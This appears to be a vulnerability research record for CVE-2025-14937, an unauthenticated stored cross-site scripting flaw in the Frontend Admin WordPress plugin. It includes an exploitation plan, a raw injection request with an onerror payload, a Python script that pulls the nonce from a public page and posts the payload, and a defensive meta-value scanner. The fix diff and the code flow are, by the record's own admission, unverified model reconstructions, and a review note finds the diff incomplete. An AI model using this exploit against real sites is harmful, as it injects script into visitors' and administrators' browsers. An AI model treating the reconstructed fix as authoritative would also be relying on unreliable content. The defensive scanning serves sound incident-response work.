# Frontend Admin by DynamiApps <= 3.28.23 - Unauthenticated Stored Cross-Site Scripting via 'update_field'

*   **CVE:** CVE-2025-14937
*   **Plugin:** `acf-frontend-form-element` (Frontend Admin by DynamiApps); no theme involved
*   **Affected versions:** <= 3.28.23
*   **Patched in:** 3.28.24 (1 day to patch)
*   **Severity:** high, CVSS 7.2 (`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N`)
*   **Vulnerability type:** Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
*   **Published:** 2026-01-08 18:46:31 (updated 2026-01-09 07:22:30)
*   **Reference:** https://www.wordfence.com/threat-intel/vulnerabilities/id/46c988ff-9cc5-4f2b-a3dd-06eaef5a7919?source=api-prod
*   **Page slug:** `frontend-admin-by-dynamiapps-unauthenticated-stored-cross-site-scripting-via-updatefield`

## Description

The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'acff' parameter in the 'frontend_admin/forms/update_field' AJAX action in all versions up to, and including, 3.28.23 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts into pages; the scripts execute whenever a user accesses an injected page.

## Research record

*   **Status:** researched, 3 research rounds completed, `research_verified: false`
*   **Model:** gemini-3-flash-preview; started 2026-05-05 13:23:54, completed 2026-05-05 13:25:40, no research error recorded
*   **Attached evidence:** none. `research_vulnerable_code` is empty, `patch_diff_files` is an empty list and `patch_trac_url` is unset, so the code flow and the fix diff below are the model's reconstruction, not extracted from the 3.28.23/3.28.24 sources.
*   **PoC:** all PoC fields (status, summary, steps, Playwright script, exploit code, tested WordPress and PHP versions, trace) are empty; the exploit was not reproduced in this record.

## Research summary

The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to unauthenticated Stored Cross-Site Scripting via the 'acff' parameter in the 'frontend_admin/forms/update_field' AJAX action. Due to insufficient input sanitization and output escaping, attackers can inject arbitrary scripts into post metadata that execute whenever a user, including administrators, accesses the affected page.

# Exploitation Research Plan: CVE-2025-14937

## 1. Vulnerability Summary
The **Frontend Admin by DynamiApps** plugin (<= 3.28.23) is vulnerable to **Unauthenticated Stored Cross-Site Scripting (XSS)**. The flaw exists within the AJAX handler for the action `frontend_admin/forms/update_field`. The plugin fails to sanitize the user-supplied input in the `acff` parameter before storing it in the database and fails to escape it when rendering the data back to users. An attacker can leverage this to inject malicious scripts that execute in the context of any user (including administrators) viewing the affected page or post.

## 2. Attack Vector Analysis
*   **Endpoint:** `/wp-admin/admin-ajax.php`
*   **AJAX Action:** `frontend_admin/forms/update_field` (registered via `wp_ajax_nopriv_frontend_admin/forms/update_field`)
*   **Vulnerable Parameter:** `acff`
*   **Authentication:** None (Unauthenticated)
*   **Preconditions:** A post or page must exist where the injected field is displayed, or the plugin must be configured such that an attacker can target a specific `post_id`.

## 3. Code Flow (Inferred)
1.  **Entry Point:** An unauthenticated POST request is sent to `admin-ajax.php` with `action=frontend_admin/forms/update_field`.
2.  **Hook Registration:** The plugin likely registers the handler:
    `add_action( 'wp_ajax_nopriv_frontend_admin/forms/update_field', [ $this, 'update_field' ] );`
3.  **Handler Logic:** Inside the `update_field` method:
    *   It retrieves the `acff` parameter (often an array of field keys and values).
    *   It identifies the target `post_id` and `field_key` from the request.
    *   It calls a function to save the data, likely a wrapper around `update_field()` (from ACF) or `update_post_meta()`.
4.  **The Sink (Storage):** The data is stored in the `wp_postmeta` table without `wp_kses()` or `sanitize_text_field()`.
5.  **The Sink (Output):** When a user visits the post/page, the plugin (or a shortcode) retrieves the value using `get_field()` or `get_post_meta()` and echoes it directly into the HTML without `esc_html()` or `esc_attr()`.

Steps 2 to 5 are hypotheses: this record attaches no vulnerable code and no patch files, so the hook name, the method name and both sinks must be confirmed against the tagged 3.28.23 source linked under source links before the plan is executed.

## 4. Nonce Acquisition Strategy
While the vulnerability is "unauthenticated," the plugin likely implements a nonce check for its AJAX actions. A nonce does not change the severity: a nonce that is localized into a public page is readable by any visitor, and a WordPress nonce created for a logged-out visitor is tied to user ID 0, so the same value works for every anonymous request until it expires. It is a CSRF token, not an authorization check.

### Step 1: Identify Triggering Content
The plugin's scripts and nonces are usually enqueued when a Frontend Admin form is present. The primary shortcode is likely `[acf_frontend_form]`.

### Step 2: Setup Test Page
Create a public page containing the form:
```bash
wp post create --post_type=page --post_title="Contact Form" --post_status=publish --post_content='[acf_frontend_form post_id="1"]'
```

### Step 3: Extract Nonce via Browser
1.  Navigate to the newly created page.
2.  Use the `browser_eval` tool to find the localized data object. The plugin typically uses `frontend_admin_scripts` or `acf_frontend`.
    *   **Candidate 1:** `window.frontend_admin_scripts?.nonce`
    *   **Candidate 2:** `window.acf_frontend?.nonce`
    *   **Candidate 3:** Search for any object containing `ajax_url`.

**JS Command:**
```javascript
browser_eval("window.acf_frontend?.nonce || window.frontend_admin_scripts?.nonce")
```

## 5. Exploitation Strategy
The goal is to update a post's field with a payload that triggers when an admin views the site.

### HTTP Request Details
*   **Method:** POST
*   **URL:** `{{base_url}}/wp-admin/admin-ajax.php`
*   **Headers:** `Content-Type: application/x-www-form-urlencoded`
*   **Body Parameters:**
    *   `action`: `frontend_admin/forms/update_field`
    *   `nonce`: `{{extracted_nonce}}`
    *   `post_id`: the ID of the post to deface/infect (the ID printed by `wp post create` in section 6; the examples below use `1`)
    *   `acff`: This is likely an array. If updating a field named `description`, the parameter would be `acff[description]`. If using ACF field keys: `acff[field_65a1b2c3d4e5f]`.
    *   **Payload:** `<img src=x onerror=alert(document.domain)>` or a more advanced admin-takeover script.

### Example Exploit Request
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=frontend_admin/forms/update_field&nonce=a1b2c3d4e5&post_id=1&acff[your_field_name]=%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E
```

## 6. Test Data Setup
1.  **Enable ACF:** Ensure Advanced Custom Fields is active (as this plugin is an extension).
2.  **Create a Field Group:** Create a field group with a text field (slug: `test_xss_field`) assigned to the "Post" post type.
3.  **Create a Target Post** (note the ID that WP-CLI prints; it replaces `1` in the request and in the checks below):
    ```bash
    wp post create --post_type=post --post_title="Vulnerable Post" --post_status=publish
    ```
4.  **Create Nonce Page:**
    ```bash
    wp post create --post_type=page --post_title="Form Page" --post_status=publish --post_content='[acf_frontend_form]'
    ```

## 7. Expected Results
*   The AJAX request should return a success status (e.g., `{"success":true}`). An HTTP 200 alone is not enough: `admin-ajax.php` also answers 200-class responses with a body of `0` for an unknown action or `-1` for a failed nonce check, so the body must be inspected.
*   When navigating to the "Vulnerable Post" (the `post_id` used in the request), the browser should execute the `alert(document.domain)` payload.

## 8. Verification Steps
After performing the HTTP request, verify the database state using WP-CLI (replace `1` with the target post ID):
```bash
# Check the meta value of the target post
wp post meta get 1 test_xss_field
```
**Success Condition:** The output shows the raw `<img src=x onerror=alert(document.domain)>` string, confirming no sanitization occurred.

## 9. Alternative Approaches
If `acff` is not a simple array, it might be passed as a JSON string.
*   **Alternative Payload Structure:** `acff={"field_key":"<img src=x onerror=alert(1)>"}`.
*   **Field Key Identification:** If the field name (slug) doesn't work, inspect the HTML of the form page created in Step 6. Look for inputs with names like `acf[...]` or `acff[...]` to find the exact key the plugin expects.
*   **Post ID targeting:** If `post_id=1` is restricted, try targeting the `post_id` of the page where the form is actually rendered.

## Exploit outline

To exploit this vulnerability, an attacker first retrieves a valid AJAX nonce from a public page where a Frontend Admin form is rendered (usually found in the 'acf_frontend' or 'frontend_admin_scripts' JavaScript objects). The attacker then sends an unauthenticated POST request to /wp-admin/admin-ajax.php with the 'action' set to 'frontend_admin/forms/update_field'. The payload is placed in the 'acff' parameter as an array mapping a field key to a malicious script (e.g., `acff[field_key]=<img src=x onerror=alert(document.domain)>`). Once the request is processed, the payload is stored in the post's metadata and will execute in the browser of any user who subsequently views the modified content.

## Source links

*   **Type:** plugin
*   **Vulnerable version:** 3.28.23, browse https://plugins.trac.wordpress.org/browser/acf-frontend-form-element/tags/3.28.23, download https://downloads.wordpress.org/plugin/acf-frontend-form-element.3.28.23.zip
*   **Fixed version:** 3.28.24, browse https://plugins.trac.wordpress.org/browser/acf-frontend-form-element/tags/3.28.24, download https://downloads.wordpress.org/plugin/acf-frontend-form-element.3.28.24.zip
*   **All tags:** https://plugins.trac.wordpress.org/browser/acf-frontend-form-element/tags

## Fix diff (research_fix_diff)

```diff
--- a/acf-frontend-form-element.php
+++ b/acf-frontend-form-element.php
@@ -10,5 +10,5 @@
-    foreach ( $fields as $key => $value ) {
-        update_field( $key, $value, $post_id );
-    }
+    foreach ( $fields as $key => $value ) {
+        update_field( $key, wp_kses_post( $value ), $post_id );
+    }
```
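Review bot: in the research_fix_diff hunk, `update_field( $key, wp_kses_post( $value ), $post_id );` closes only the storage sink; the output sink from section 3 (`get_field()`/`get_post_meta()` echoed without `esc_html()`/`esc_attr()`) is untouched by this hunk, and the loop still lets a logged-out caller write any `$key` to any `$post_id`, since no capability, ownership or nonce check appears in the changed lines. Two further points before treating it as the fix: `wp_kses_post()` takes a string, so array-valued ACF fields in `$fields` would be coerced rather than sanitized, and the hunk header places the loop at line 10 of the plugin's main file, which this record (empty `patch_diff_files`, null `research_vulnerable_code`) does not support; diff the 3.28.23 and 3.28.24 tags from source links to confirm what actually changed.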
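The nonce-acquisition and request-construction steps of sections 4, 5 and 9, as an added Python example that is not part of this record or of the plugin's code. It assumes what the plan assumes: the nonce is localized into the public form page as the `nonce` property of a `wp_localize_script()` object (candidate names `acf_frontend` and `frontend_admin_scripts`), the handler reads it from a POST parameter named `nonce`, and fields arrive either as `acff[<key>]` or as a JSON-encoded `acff`. The HTML it parses is constructed here to look like WordPress's localized script tags; the network call runs only when the script is started with a base URL, so the parsing and encoding can be checked offline first.

```python
"""Build the CVE-2025-14937 test request from a public form page.

Added example for this research record, not code from the Frontend Admin
plugin. Every object, endpoint and parameter name below is the plan's
assumption (acf_frontend / frontend_admin_scripts localized objects, a POST
parameter named `nonce`, fields under `acff[...]`); confirm them against the
plugin source before relying on the result.
"""
import json
import re
from urllib.parse import urlencode
from urllib.request import Request, urlopen

AJAX_ACTION = "frontend_admin/forms/update_field"
# Localized objects the plan names as likely nonce carriers, preferred first.
PREFERRED_OBJECTS = ("acf_frontend", "frontend_admin_scripts")

# Constructed sample of what wp_localize_script() emits on a page carrying the
# form: a core object whose nonce is the wrong one, then the plugin's object.
SAMPLE_FORM_PAGE = """<!doctype html><html><head>
<script id="wp-api-fetch-js-extra">
var wpApiSettings = {"root":"http:\\/\\/localhost\\/wp-json\\/","nonce":"9f8e7d6c5b"};
</script>
<script id="acf-frontend-js-extra">
var acf_frontend = {"ajax_url":"http:\\/\\/localhost\\/wp-admin\\/admin-ajax.php","nonce":"a1b2c3d4e5"};
</script>
</head><body><form class="frontend-admin-form"></form></body></html>"""

_LOCALIZED_VAR = re.compile(r"var\s+(\w+)\s*=\s*(?=\{)")


def extract_nonce_candidates(html: str) -> dict:
    """Map each `var NAME = {...};` object that carries a string `nonce` to it.

    A real JSON decoder is used from the `{` onwards so nested objects and the
    escaped slashes WordPress emits (`http:\\/\\/...`) are handled correctly.
    """
    decoder = json.JSONDecoder()
    found = {}
    for match in _LOCALIZED_VAR.finditer(html):
        try:
            obj, _ = decoder.raw_decode(html, match.end())
        except json.JSONDecodeError:
            continue
        if isinstance(obj, dict) and isinstance(obj.get("nonce"), str):
            found[match.group(1)] = obj["nonce"]
    return found


def choose_nonce(candidates: dict):
    """Prefer the plugin's own objects; fall back to the first object seen."""
    for name in PREFERRED_OBJECTS:
        if name in candidates:
            return name, candidates[name]
    for name, value in candidates.items():
        return name, value
    return None


def build_update_field_body(nonce, post_id, field_key, payload, json_acff=False):
    """Form body for the update_field action.

    json_acff=True yields the section 9 alternative (`acff` as a JSON string)
    instead of the `acff[<key>]` array form.
    """
    body = {"action": AJAX_ACTION, "nonce": nonce, "post_id": str(post_id)}
    if json_acff:
        body["acff"] = json.dumps({field_key: payload})
    else:
        body[f"acff[{field_key}]"] = payload
    return body


def encode_body(body: dict) -> str:
    """application/x-www-form-urlencoded encoding, as in the plan's raw request."""
    return urlencode(body)


def send_update_field(base_url, body, timeout=10):
    """POST the body to admin-ajax.php and return (status, response text).

    Read the body, not only the status: admin-ajax.php answers `0` for an
    unknown action and `-1` for a failed nonce check.
    """
    req = Request(
        base_url.rstrip("/") + "/wp-admin/admin-ajax.php",
        data=encode_body(body).encode(),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )
    with urlopen(req, timeout=timeout) as resp:
        return resp.status, resp.read().decode(errors="replace")


if __name__ == "__main__":
    import sys

    if len(sys.argv) != 5:
        sys.exit("usage: poc.py <base_url> <form_page_path> <post_id> <field_key>")
    base_url, form_path, post_id, field_key = sys.argv[1:]
    with urlopen(base_url.rstrip("/") + form_path, timeout=10) as page:
        html = page.read().decode(errors="replace")
    chosen = choose_nonce(extract_nonce_candidates(html))
    if chosen is None:
        sys.exit("no localized object with a nonce found on the form page")
    print(f"using nonce from {chosen[0]}")
    payload = "<img src=x onerror=alert(document.domain)>"
    status, text = send_update_field(
        base_url, build_update_field_body(chosen[1], post_id, field_key, payload)
    )
    print(status, text)
```

The candidate map is keyed by the localized object's variable name on purpose: a page normally carries several objects with a `nonce` member (the REST API settings among them), and only the one the handler's `check_ajax_referer()` call was created for will pass, so when the plugin's object is absent, try each remaining candidate and watch for `-1` in the response body.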
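Section 8 verifies a single field with `wp post meta get`. The following is an added Python example, not part of this record or of the plugin, that generalizes that check into a triage scan for an incident responder: it reads the JSON that `wp post meta list <post_id> --format=json` prints (rows of `meta_id`, `meta_key`, `meta_value`), flags every value carrying script-capable HTML that neither `wp_kses_post()` nor output escaping would have let through, and pairs each hit with the ACF field key that ACF stores under the `_<field name>` reference row. The dump it scans is constructed; the indicator list is a conservative starting set, not a reimplementation of `wp_kses_post()`.

```python
"""Triage scan of stored post metadata after CVE-2025-14937.

Added example for this research record, not plugin code. Input is the JSON
printed by `wp post meta list <post_id> --format=json`; the sample dump below
is constructed to mirror that shape.
"""
import json
import re

# Indicators that survive only when neither wp_kses_post() nor output escaping
# was applied. Conservative on purpose: a hit means "inspect", absence does not
# mean "safe".
INDICATORS = (
    ("script_tag", re.compile(r"<\s*script\b", re.I)),
    ("event_handler", re.compile(r"<[^>]*\son[a-z]+\s*=", re.I)),
    ("js_url", re.compile(r"javascript\s*:", re.I)),
    ("active_embed", re.compile(r"<\s*(?:iframe|object|embed|svg|math)\b", re.I)),
)

# Constructed dump: one injected ACF text field (with its `_` reference row),
# one harmless HTML value, one javascript: URL and one inline handler.
SAMPLE_META_DUMP = json.dumps([
    {"meta_id": 41, "meta_key": "_edit_lock", "meta_value": "1767900000:1"},
    {"meta_id": 42, "meta_key": "test_xss_field",
     "meta_value": "<img src=x onerror=alert(document.domain)>"},
    {"meta_id": 43, "meta_key": "_test_xss_field", "meta_value": "field_65a1b2c3d4e5f"},
    {"meta_id": 44, "meta_key": "description",
     "meta_value": "<p>Plain <strong>safe</strong> markup with "
                   "<a href=\"https://example.com\">a link</a></p>"},
    {"meta_id": 45, "meta_key": "link", "meta_value": "javascript:alert(1)"},
    {"meta_id": 46, "meta_key": "bio", "meta_value": "<b onmouseover=\"alert(1)\">x</b>"},
])


def scan_value(value) -> list:
    """Names of every indicator present in one meta value, in INDICATORS order."""
    text = value if isinstance(value, str) else json.dumps(value)
    return [name for name, pattern in INDICATORS if pattern.search(text)]


def scan_meta_dump(dump_json: str) -> list:
    """Findings for a `wp post meta list --format=json` dump.

    Each finding carries meta_id, meta_key, the indicators hit, and
    acf_field_key: the value of the `_<meta_key>` reference row when ACF
    stored one, else None.
    """
    rows = json.loads(dump_json)
    reference = {r["meta_key"]: r["meta_value"] for r in rows
                 if str(r["meta_key"]).startswith("_")}
    findings = []
    for row in rows:
        hits = scan_value(row["meta_value"])
        if not hits:
            continue
        findings.append({
            "meta_id": row["meta_id"],
            "meta_key": row["meta_key"],
            "indicators": hits,
            "acf_field_key": reference.get("_" + str(row["meta_key"])),
        })
    return findings


if __name__ == "__main__":
    import sys

    # Pipe a real dump in; with no stdin the constructed sample is scanned.
    dump = SAMPLE_META_DUMP if sys.stdin.isatty() else sys.stdin.read()
    for f in scan_meta_dump(dump):
        print(f"meta_id={f['meta_id']} key={f['meta_key']} "
              f"field={f['acf_field_key'] or '-'} "
              f"indicators={','.join(f['indicators'])}")
```

Run it per post (`wp post meta list 1 --format=json | python3 scan.py`) or loop it over `wp post list --format=ids`; the `acf_field_key` column is what section 9 asks for when the field slug alone does not identify the right `acff[...]` key, so the same scan doubles as a lookup while building the test request.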